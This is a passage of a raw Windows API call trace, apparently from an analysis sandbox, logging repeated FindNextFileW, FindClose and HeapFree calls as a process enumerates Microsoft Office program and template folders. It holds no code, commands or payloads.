lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0069.937] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.937] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0069.937] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.937] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0069.937] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0069.937] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.937] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b382177, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3392, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="MSO0127.ACL", cAlternateFileName="")) returned 1 [0069.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.941] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdb652e29, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcec30aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x205e48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ONENOTE.EXE", cAlternateFileName="")) returned 1 [0069.944] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.944] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x656d8, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="OUTLPH.DLL", cAlternateFileName="")) returned 1 [0069.947] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.947] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1d791bfc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2169a085, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf2be48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PDFREFLOW.EXE", cAlternateFileName="PDFREF~1.EXE")) returned 1 [0069.947] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.947] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf318faf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf318faf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf31b5d3e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0069.947] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.947] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe34d5ed4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34d5ed4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe34d5ed4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0069.948] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.948] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc52c782a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msgr8en.dub", cAlternateFileName="")) returned 1 [0069.948] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.948] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd41f54a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdec90856, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xded02ee7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14c660, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PropertyModel.dll", cAlternateFileName="PROPER~1.DLL")) returned 1 [0069.950] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.950] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x2296098c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd0460, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PUBCONV.DLL", cAlternateFileName="")) returned 1 [0069.959] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.959] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeda173cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="QUERIES", cAlternateFileName="")) returned 1 [0069.960] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.960] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd71a51a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd71a51a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcd7406da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xad30, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="rdpqoemetrics.dll", cAlternateFileName="RDPQOE~1.DLL")) returned 1 [0069.961] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.961] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4fef2b0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x8aa50, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="SAVASWEB.DLL", cAlternateFileName="")) returned 1 [0069.961] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.962] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x397278, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="STSLIST.DLL", cAlternateFileName="")) returned 1 [0070.634] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0070.634] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4cce0ca, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cce0ca, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0070.634] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0070.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0070.635] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7f63b8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1159842, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1349614, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x14a640, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="VISIO.EXE", cAlternateFileName="")) returned 1 [0070.636] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0070.636] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede4358a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede4358a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x245644bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2851, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="XML2WORD.XSL", cAlternateFileName="")) returned 1 [0070.636] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4331018 | out: hHeap=0x5d0000) returned 1 [0070.639] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b1a0d3d, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b1a0d3d, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rsod", cAlternateFileName="")) returned 1 [0070.644] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0070.644] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb48c20e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb48c20e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0070.837] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0070.837] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb48c20e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6099da, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6099da, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0070.837] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0070.837] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0070.837] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0070.838] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0070.838] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bd4f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6a2342, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6a2342, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Part", cAlternateFileName="")) returned 1 [0070.840] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0070.840] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bd4f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6a2342, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6a2342, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Part", cAlternateFileName="")) returned 0 [0070.840] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0070.840] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0070.840] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb6099da, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6099da, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb67c092, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30f09, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AdjacencyLetter.dotx", cAlternateFileName="ADJACE~1.DOT")) returned 1 [0070.840] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0070.840] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb787155, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb787155, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb787155, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf6a1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LoanAmortization.xltx", cAlternateFileName="LOANAM~1.XLT")) returned 1 [0070.841] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0070.841] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb7ad38b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0070.841] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0070.841] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb7ad38b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 0 [0070.841] FindClose (in: hFindFile=0x4260608 | out: hFindFile=0x4260608) returned 1 [0070.841] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0070.841] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb760eed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb760eed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0070.841] FindClose (in: hFindFile=0x4260588 | out: hFindFile=0x4260588) returned 1 [0070.841] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0070.842] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb81fa9e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb81fa9e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1db9f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OriginLetter.Dotx", cAlternateFileName="ORIGIN~3.DOT")) returned 1 [0070.842] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0070.842] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24517fc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x24517fc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24517fc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 1 [0070.843] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0070.843] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24517fc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x24517fc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24517fc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 0 [0070.843] FindClose (in: hFindFile=0x4260488 | out: hFindFile=0x4260488) returned 1 [0070.843] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0070.843] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VFS", cAlternateFileName="")) returned 1 [0071.107] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4404e88 | out: hHeap=0x5d0000) returned 1 [0071.107] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x183c8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0071.107] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.107] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a112a2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x5a112a2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5a112a2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0071.108] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.108] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a112a2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x5a112a2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5a112a2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 0 [0071.108] FindClose (in: hFindFile=0x4260508 | out: hFindFile=0x4260508) returned 1 [0071.108] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.108] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf3682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b809370, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b809370, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Help", cAlternateFileName="MICROS~1")) returned 1 [0071.111] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4404e88 | out: hHeap=0x5d0000) returned 1 [0071.111] FindNextFileW (in: hFindFile=0x4260748, 